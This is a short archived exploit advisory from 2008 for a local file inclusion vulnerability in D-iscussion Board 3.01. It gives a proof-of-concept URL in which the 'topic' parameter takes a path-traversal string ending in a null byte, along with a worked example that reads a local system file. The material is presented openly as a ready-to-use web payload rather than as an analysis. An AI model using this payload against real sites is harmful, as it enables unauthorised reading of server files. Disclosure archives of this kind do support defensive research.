[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : D-iscussion Board 3.01 (topic) Local File Inclusion Vulnerability
# Published : 2008-09-11
# Author : SirGod
# Previous Title : Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit
# Next Title : phsBlog 0.2 Bypass SQL Injection Filtering Exploit


############################################################################################################
[+] D-iscussion Board 3.01 Local File Inclusion
[+] Discovered By SirGod 
[+] MorTal TeaM                     
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,str0ke                      
############################################################################################################

Download : http://dino.shiftedphase.com/comp/downloads/forum.zip

[+] Local File Inclusion


   PoC :
 
     http://[target]/[path]/general/index.php?topic=[LocalFile]%00

   Example :

     http://127.0.0.1/3.01/general/index.php?topic=../../../../autoexec.bat%00

############################################################################################################

# www.Syue.com [2008-09-11]